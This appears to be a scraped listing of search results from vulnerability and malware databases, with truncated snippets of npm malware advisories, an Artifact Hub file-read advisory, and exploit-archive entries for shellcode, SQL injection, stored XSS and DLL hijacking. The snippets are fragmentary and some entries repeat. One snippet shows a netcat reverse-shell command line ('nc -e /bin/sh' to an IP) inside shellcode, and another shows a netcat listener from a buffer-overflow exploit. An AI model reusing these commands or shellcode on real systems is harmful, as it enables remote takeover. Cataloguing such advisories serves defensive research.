Malicious code in arc-offsec-header (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 10c818d61d5a433e8603351eaeaa1329d8a7365d5c6b8497143cf7c8e5c1f9f9 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious code in arc-offsec-custom-library6 (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 05c0ad6a05bb523b5d5f58ae559288cd55c8c2019374a44703101d1efff52f1b Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

MAL-2025-4584 Malicious code in arc-offsec-custom-library2 (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis a8fa793672d2e0686853c58a6768867a936971cb91561c3a1cbcebda67c22121 The OpenSSF Package Analysis project identified 'arc-offsec-custom-library2' @ 1.0.9 npm as malicious. It is considered malicious because: - The...

Malicious code in arc-offsec-custom-library2 (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis a8fa793672d2e0686853c58a6768867a936971cb91561c3a1cbcebda67c22121 The OpenSSF Package Analysis project identified 'arc-offsec-custom-library2' @ 1.0.9 npm as malicious. It is considered malicious because: - The...

Exploit for Injection in Glpi-Project Glpi

CVE-2022-35914poc Modified for GLPI Offsec Lab: calluserfun...

GHSA-HMQ4-C2R4-5Q8H Artifact Hub arbitrary file read vulnerability

Impact During a security audit of Artifact Hub's code base, a security researcher at OffSec identified a bug in which by using symbolic links in certain kinds of repositories loaded into Artifact Hub, it was possible to read internal files. Artifact Hub indexes content from a variety of sources,...

Artifact Hub arbitrary file read vulnerability

Impact During a security audit of Artifact Hub's code base, a security researcher at OffSec identified a bug in which by using symbolic links in certain kinds of repositories loaded into Artifact Hub, it was possible to read internal files. Artifact Hub indexes content from a variety of sources,...

GhostInTheNet - Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan

Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan. Properties: Network Invisibility Network Anonymity Protects from MITM/DOS Transparent Cross-platform Minimalistic Dependencies: Linux 2.4.26+ - will work on any Linux-based OS, including Whonix and...

Linux/x86-64 - Ncat Shellcode (SSL, MultiChannel, Persistant, Fork, IPv4/6, Password) (176 bytes)

include include // Exploit Title: Linux 64bit Ncat + SSL + MultiChannel + Persistant + Fork + IPv4/6 + Password 176byte // Date: 7/5/2016 // Exploit Author: CripSlick // Tested on: Kali 2.0 // Version: Ncat: Version 7.01 // email protected // OffSec ID: OS-20614 // http://50.112.22.183/...

Linux/x86-64 - Ncat Shellcode (SSL, MultiChannel, Persistant, Fork, IPv4/6, Password) (176 bytes)

include include // Exploit Title: Linux 64bit Ncat + SSL + MultiChannel + Persistant + Fork + IPv4/6 + Password 176byte // Date: 7/5/2016 // Exploit Author: CripSlick // Tested on: Kali 2.0 // Version: Ncat: Version 7.01 // email protected // OffSec ID: OS-20614 // http://50.112.22.183/...

Linux Netcat Reverse Shell - 32bit - 77 bytes

Linux Netcat Reverse Shell - 32bit - 77 bytes. Shellcode exploit for linx86 platform include include //[email protected] //OffSec ID: OS-20614 / global start start: ;/bin//nc -e///bin/sh 10.0.0.6 99 xor eax,eax ; clear eax xor edx,edx ; clear edi ; 0xIN-LAST IN-FIRST push 0x3939393...

phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection Vulnerability

phpSFP Schedule Facebook Posts version 1.5.6 suffers from a remote SQL injection vulnerability. | | / | \ | |/ |/ | / | | | | | | | | | | | | | / \ | | | || || | |\ | || | | / | | |/|| ||// \| phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection 0-day Website :...

Adobe Device Central CS5 DLL Hijacking Exploit (qtcf.dll)

No description provided by source. / Exploit Title: Adobe Device Central CS5 DLL Hijacking Exploit qtcf.dll Date: August 24, 2010 Author: Glafkos Charalambous glafkos@astalavistadotcom Version: Latest CS5 v3.0.0376 Tested on: Windows 7 x64 Ultimate Vulnerable extensions: .adcp Greetz: Astalavista...

ActiveBuyandSell 6.2 - (buyersend.asp catid) Blind SQL Injection Vulnerability

No description provided by source. ? ?????????????????????????In The Name Of Allah The Mercifull?????????????????????? ? Tybe: buyersend.asp catid Blind SQL Injection Vulnerability Vendor: :www.activewebsoftwares.com Software: ActiveBuyandSell v 6.2 author: R3d-D3v!L Date: 18.dec.2009 T!ME: 12:00...

SLMail 5.5 - POP3 PASS Buffer Overflow Exploit

No description provided by source. SLmail 5.5 POP3 PASS Buffer Overflow Discovered by : Muts Coded by : Muts www.offsec.com Plain vanilla stack overflow in the PASS command D:\Projects\BOSLmail-5.5-POP3-PASS.py D:\Projects\BOnc -v 192.168.1.167 4444 localhost.lan 192.168.1.167 4444 ? open Microso...

win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes

No description provided by source. / Title: win32/xp pro sp3 EN 32-bit - add new local administrator 113 bytes Author: Anastasios Monachos secuid0 - anastasiosmatgmaildotcom Method: Hardcoded opcodes kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa Tested on: WinXP Pro SP3 EN 32bit - Buil...

wordpress simplemail plugin 1.0.6 - Stored XSS

No description provided by source. !/usr/bin/python ''' Author: loneferret of Offensive Security Product: SimpleMail Version: 1.0.6 free version Vendor Site: http://codecanyon.net/item/wp-simplemail/1130008?ref=tinsley Software Download: http://wordpress.org/extend/plugins/wp-simplemail/ Timeline...

mailtraq 2.17.3.3150 - Stored XSS

No description provided by source. !/usr/bin/python ''' Author: loneferret of Offensive Security Product: MailTraq Version: 2.17.3.3150Mar 5th, 2012 Vendor Site: http://www.mailtraq.com/ Software Download: http://www.mailtraq.com/30day Timeline: 29 May 2012: Vulnerability reported to CERT 30 May...

RecipePal 1.0 - SQL Injection Vulnerability

No description provided by source. ? ?????????????????????????In The Name Of Allah The Mercifull?????????????????????? ? Tybe: howrecipe.asp ID BL!ND SQL Injection Vulnerability ? Vendor: www.datachecknh.com ? ? Software:RecipePal v1.0 ? Price : $9.95 ? author: R3d D3v!L ??.?.? ? Date: 15.12.2009...

Adobe InDesign CS4 DLL Hijacking Exploit (ibfs32.dll)

No description provided by source. / Exploit Title: Adobe InDesign CS4 DLL Hijacking Exploit ibfs32.dll Date: August 25, 2010 Author: Glafkos Charalambous glafkos@astalavistadotcom Version: CS4 v6.0 Tested on: Windows 7 x64 Ultimate Vulnerable extensions: .indl .indp .indt .inx Greetz: Astalavist...